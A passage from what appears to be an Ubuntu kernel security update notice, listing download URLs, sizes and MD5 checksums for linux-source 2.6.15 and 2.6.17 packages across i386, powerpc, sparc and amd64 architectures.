http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    36004 79c83133b8cd5332d987af6732b5a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   132396 8974418e303a296cb54d3374d7ddbc7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    38558 a7e86b9c3ea22c24aa02ec85e468027a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   299120 fcbba364de96ff32f4e000960d865dbc

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    23720 71c7a353660e8ba4cd1bb2a725e8794a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    25946 31100ff20bf8a91d255baffdb7ed24c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    49310 3917c41f951d8135b58d384cc295ba3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    51522 068cf8545f1c6e84713872fa09f7ff01
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     2298 8dc27a2b671eeac1cf741e9f017608e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     2478 39954bd290beee900a99cf4e18236500
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    40180 455ec7c5f4c44e5c0c49346656a8c91e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    43752 5b639ddf72bd3c8b86b758fe7e282c91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   112606 14b8d1dde7b73685eba425afb8137aa5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   120650 990d9bd729ec95c4a64c0cc44d6ce511
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    40844 6aacad8fde4f19deab9fb6b5a82fa021
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    45948 131fe39130f08767edc073bb7fff91c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    29024 9f8268948ddda0fd06bf0422287f04e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    29896 52b3144e286bb4f43db1ebd6371ca6a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   211404 5cdadc28df070e7fec3425a7ae4e7237
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   225206 14a95c507a5e9498fdf19dbf90055d19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    45050 d251407f11177dc5eff3e83adb6b8879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    40214 8b75f8145a1a950862d98f4508a687ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     1932 370a87957eab079087b8b42c6d874a6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     2196 101e82bbe9f4091d0be2a314547f5445
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    80610 20d208d10bbd6dc7993a542ddc85946f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    85962 325dc6c16f674c06c6bc0a0e4c8f48d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   111636 3d777ec6f6a207ef5edb3a433646bbd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   125798 1fa189d90bf1ab134b6df072cf8c57eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    53406 16e226cce6f3aa1c1d3060a3f5e112fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    58478 abfb59df627d4449f15889566f1ca321
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   147758 4c740241e4cf4dd99047563ff906134d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   161708 94713d944992ff495a8b06f7f8b0408c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   317488 9825301a5a53d42152eb325b6e75f41b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   287588 f3fd4d02234eaead52ca6f7175a0ab94
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   115852 06db1d8c68b986d8ed5227e58d1b37fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   116518 45d5239edf3d33ad57415a5d8cd6c609
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1923398 4408c098e595544fcfd4c733fd05e171
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  2436410 aba89b7121acb495de41d21de717f343
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb
  Size/MD5:   871286 def32ee67cef0fb005d6974495b7336d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc64-smp_2.6.15-29.60_powerpc.deb
  Size/MD5:   865650 346ba91a7933f7077d637d699c339704
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc_2.6.15-29.60_powerpc.deb
  Size/MD5:   869412 f46a8e9cff526da2a14669686b645a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_powerpc.deb
  Size/MD5:  6939760 781f0d4d1c1944f04501b64f3836b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb
  Size/MD5: 22771282 e1b124721406c6b53c9a4e71095a7ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc64-smp_2.6.15-29.60_powerpc.deb
  Size/MD5: 23660438 77f33e3630afd0d868a93f73ae6ce971
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc_2.6.15-29.60_powerpc.deb
  Size/MD5: 22345100 20b7671c82d0018c052af93980fd2387
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    17776 25c3e8dd71622fde5e04a4e8226f8bd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    17380 5f65b0013ced25fd3e3c97e855dcfb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   261144 0850d394737d72d2b69cccb90d8bd298
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   282362 dc990649bbcae62551eb1d82a186e1d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   227460 6697fdf2fc11167e650c154149dedf73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   248672 8b6f55be661e7658641b4bf907449b16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1048460 b92207c7d247b006865f4efb43af4c26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1048602 04bc72dfbe3178226f56bcf659aeb329
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1673618 bfcca94316d72ef3fe37663fb50d49cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1808832 bf0120f79276e526ef3a6c725baf14b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   250938 7299878a93cdaa4774374977af8578d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   233676 936608603971bc17da1d7eb454019002
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    13028 9d1fadfa7db678a207fb41fca4c9c8fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    13520 ca02a743ad543f2fe0a34aca46a1b8dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    84828 838270387082b8790865142c322f3633
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    52190 55d9d3ec73d5bf63771bae39f3afde2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    73922 8b247b5ba9a5f30d5ae902fe40404c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    85842 03aed80fffc10e279ea3b579a145077b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     6614 2ec4eb15148b5d34078942f3067093ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:     7062 2f479a6496c2c309ffbb0faca1445b62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    60354 c7bbac75e71a8941f13c2a78216bc950
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    70344 6d5419510b75944b5e2f4bd448ba1319
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   128540 391195c7cecdf7d9b4f45fe1ab560cd1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   157796 6c70763c24a705dfa0eb879a520b8c15
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   107926 72e4e26c739ff9f3a1447aebae381c1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   125994 f2b44cbfd5b45da765b5b4b07bec046d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    87302 a6cfc94b165e166dfbe252cc4896a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    93314 133e824e92874f3d0ad52fd939e8a6bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  2013978 d38120c97ad1709fab469b15c2bbae5a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:  1988082 e74a6bf1b287e56dd22de0f0277bb56c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   104106 26288f2ec996674070cc33b01bc10d60
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   115700 28120f26d175bb1c918148c712f2a1ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    12734 575a1e0b57493766b89cbe2073c607c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    14438 5d024158fb0968eb15c4258c572793c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    39942 51288398e47db398b0963f3cabddd1c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    41468 654fbdcecfabd8e2f82018eb0c79ec7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   149096 8eb8cacd2c42b67a99184ecd532954a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   167806 275e5b337af9824da2d32674e4002441
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    42264 cdd311c34cd98b72505cb9b7fc29e54d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:    44864 5968ad9249a390b7b6f945e7e886b38d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   320282 567132be9ab4915e8a727dca3825cce1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb
  Size/MD5:   324706 0e1c34481464c21d9c549e6d8ab56f74

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    50460 122260eef1dbe81b1881eca73cf34511
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:     2352 0ca1bcc3e2419fccaaec14d144350b20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    40318 1d3bbb903f0cd1d8c6dde3986f7fcb71
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   110514 1aec1e36c2ace3768412f85a6bb32b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    41164 4e857743fe021a630e9603902433e699
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   104230 a9627f63768ce523a613a2fe3e909932
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:     7434 0398c8cd2a3ddd6f4668e2fc06d6501e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   149018 e2a311dc228e0cfcb50f3de557b5ec4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:  1708170 517223272ea5c253b8af308f9a6b1f0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb
  Size/MD5:   768058 d951ceb425e2545ddfacbd9903b4e2d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64_2.6.15-29.60_sparc.deb
  Size/MD5:   767444 61c117b065e8530ac82cf713b28a4ce8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_sparc.deb
  Size/MD5:  6953066 be53cfd8bac058a184949486a4ee375e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb
  Size/MD5: 15002518 948e0705c2043861706cd39dfefb0961
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64_2.6.15-29.60_sparc.deb
  Size/MD5: 14818188 72edbea8d476c99cc2ddb0abeeb08750
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:     7422 e7fb8bc57b20365a81768e98ef5e05ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   248516 3243cb52073355711a03149b94a4b113
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   212254 e54a947086429985c690c33fa3b82eb8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:  1048436 664e62e3f4e612e9532a76a0ebc6b72a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:  1421620 d7979dc768f2a8489e1f001348c42296
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    10122 b69d5c2ec7c75714c84bcadbb039dcaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    40182 bdbdd74f461c09d1e4ca0e0fa262b119
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:     9360 2fe0cbcd916e3b298aaf4527bdafb80e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    61446 2654965940d7e649fb5abcfa886a4f51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   163010 9165e588df1065c4d83509125bc1752b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    63986 e20b3398eaf223a365bbccd0fad14383
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:  1235104 ef88ccfedacbc52ef7549a62431fe0c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    59352 c81290c1da7258811e9b31d9d62b442b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:    37400 96a0767df52f78a9a5546692ec73e39f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb
  Size/MD5:   280066 8edb68d49b4768abfbdfe791960c7aaa

Updated packages for Ubuntu 6.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.diff.gz
  Size/MD5:  2074599 1b5504b1af8fbe44c4d62bb295b6b159
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.dsc
  Size/MD5:     2324 cfb49d319e8dfdc1e2e06b9a4f703c50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz
  Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.41_all.deb
  Size/MD5:  4507110 65ddf77da17b550ddde03d4eab15b313
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.41_all.deb
  Size/MD5:  1097858 21259d89d5020f37fe3fcf45fe937c54
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41_all.deb
  Size/MD5: 46079888 c42bed702916d7098ecb51bcd5d73921

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    28614 9117a5fc208dfd877870e9847d39e1e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    50502 c13eecefce68e65441f2431e6e54526c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:     2448 25362b6cdee601920fdc0fba64694492
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    40790 8cedc390f9316032200774ded8c7edb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   113554 a30b81e0d10efbbae1a62e68ebc69882
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    43992 b66792584a0b66178adc7a07fef24086
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    54026 70015d3219760077553b85e7d1a0a841
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   189516 821bf7103ff386970bffecb3ed757ba7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    40026 20c98bf3d5f6c98eb1bfade564d0f633
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   167752 cf2ebb8e98ab008732cea50938bdf102
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    60446 faa4e7d5d0215e35042b6cce5e3e67ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   154564 697e2eb7a49669702c622909839fbe9c
